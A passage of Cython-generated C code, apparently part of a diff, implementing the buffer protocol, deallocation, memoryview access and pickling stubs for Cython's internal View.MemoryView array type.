ValueError, "Can only create a buffer that is contiguous in memory." # <<<<<<<<<<<<<< + * info.buf = self.data + * info.len = self.len + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Can_only_create_a_buffer_that_is, 0, 0); + __PYX_ERR(1, 191, __pyx_L1_error) + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + } + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + } + + /* "View.MemoryView":192 + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data # <<<<<<<<<<<<<< + * info.len = self.len + * + */ + __pyx_t_2 = __pyx_v_self->data; + __pyx_v_info->buf = __pyx_t_2; + + /* "View.MemoryView":193 + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + * info.len = self.len # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + __pyx_t_3 = __pyx_v_self->len; + __pyx_v_info->len = __pyx_t_3; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":196 + * + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim # <<<<<<<<<<<<<< + * info.shape = self._shape + * info.strides = self._strides + */ + __pyx_t_4 = __pyx_v_self->ndim; + __pyx_v_info->ndim = __pyx_t_4; + + /* "View.MemoryView":197 + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim + * info.shape = self._shape # <<<<<<<<<<<<<< + * info.strides = self._strides + * else: + */ + __pyx_t_5 = __pyx_v_self->_shape; + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":198 + * info.ndim = self.ndim + * info.shape = self._shape + * info.strides = self._strides # <<<<<<<<<<<<<< + * else: + * info.ndim = 1 + */ + __pyx_t_5 = __pyx_v_self->_strides; + __pyx_v_info->strides = __pyx_t_5; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + goto __pyx_L6; + } + + /* "View.MemoryView":200 + * info.strides = self._strides + * else: + * info.ndim = 1 # <<<<<<<<<<<<<< + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL + */ + /*else*/ { + __pyx_v_info->ndim = 1; + + /* "View.MemoryView":201 + * else: + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL # <<<<<<<<<<<<<< + * info.strides = NULL + * + */ + if (((__pyx_v_flags & PyBUF_ND) != 0)) { + __pyx_t_5 = (&__pyx_v_self->len); + } else { + __pyx_t_5 = NULL; + } + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":202 + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL # <<<<<<<<<<<<<< + * + * info.suboffsets = NULL + */ + __pyx_v_info->strides = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":204 + * info.strides = NULL + * + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * info.itemsize = self.itemsize + * info.readonly = 0 + */ + __pyx_v_info->suboffsets = NULL; + + /* "View.MemoryView":205 + * + * info.suboffsets = NULL + * info.itemsize = self.itemsize # <<<<<<<<<<<<<< + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + */ + __pyx_t_3 = __pyx_v_self->itemsize; + __pyx_v_info->itemsize = __pyx_t_3; + + /* "View.MemoryView":206 + * info.suboffsets = NULL + * info.itemsize = self.itemsize + * info.readonly = 0 # <<<<<<<<<<<<<< + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self + */ + __pyx_v_info->readonly = 0; + + /* "View.MemoryView":207 + * info.itemsize = self.itemsize + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL # <<<<<<<<<<<<<< + * info.obj = self + * + */ + if (((__pyx_v_flags & PyBUF_FORMAT) != 0)) { + __pyx_t_2 = __pyx_v_self->format; + } else { + __pyx_t_2 = NULL; + } + __pyx_v_info->format = __pyx_t_2; + + /* "View.MemoryView":208 + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self # <<<<<<<<<<<<<< + * + * def __dealloc__(array self): + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + +/* Python wrapper */ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + __pyx_t_1 = (__pyx_v_self->callback_free_data != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":212 + * def __dealloc__(array self): + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) # <<<<<<<<<<<<<< + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + */ + __pyx_v_self->callback_free_data(__pyx_v_self->data); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + if (__pyx_v_self->free_data) { + } else { + __pyx_t_1 = __pyx_v_self->free_data; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_self->data != NULL); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":215 + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) # <<<<<<<<<<<<<< + * free(self.data) + * PyObject_Free(self._shape) + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_self->data, __pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_self->ndim, 0); + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + } + + /* "View.MemoryView":216 + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) # <<<<<<<<<<<<<< + * PyObject_Free(self._shape) + * + */ + free(__pyx_v_self->data); + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + } + __pyx_L3:; + + /* "View.MemoryView":217 + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + * PyObject_Free(self._shape) # <<<<<<<<<<<<<< + * + * @property + */ + PyObject_Free(__pyx_v_self->_shape); + + /* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_5array_7memview___get__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":221 + * @property + * def memview(self): + * return self.get_memview() # <<<<<<<<<<<<<< + * + * @cname('get_memview') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_array *)__pyx_v_self->__pyx_vtab)->get_memview(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 221, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.memview.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self) { + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_memview", 0); + + /* "View.MemoryView":225 + * @cname('get_memview') + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE # <<<<<<<<<<<<<< + * return memoryview(self, flags, self.dtype_is_object) + * + */ + __pyx_v_flags = ((PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT) | PyBUF_WRITABLE); + + /* "View.MemoryView":226 + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 0, ((PyObject *)__pyx_v_self)); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.array.get_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":229 + * + * def __len__(self): + * return self._shape[0] # <<<<<<<<<<<<<< + * + * def __getattr__(self, attr): + */ + __pyx_r = (__pyx_v_self->_shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr); /*proto*/ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getattr__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_attr)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getattr__", 0); + + /* "View.MemoryView":232 + * + * def __getattr__(self, attr): + * return getattr(self.memview, attr) # <<<<<<<<<<<<<< + * + * def __getitem__(self, item): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetAttr(__pyx_t_1, __pyx_v_attr); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getattr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item); /*proto*/ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":235 + * + * def __getitem__(self, item): + * return self.memview[item] # <<<<<<<<<<<<<< + * + * def __setitem__(self, item, value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_item); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + +/* Python wrapper */ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + + /* "View.MemoryView":238 + * + * def __setitem__(self, item, value): + * self.memview[item] = value # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_item, __pyx_v_value) < 0))) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_array___reduce_cython__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + 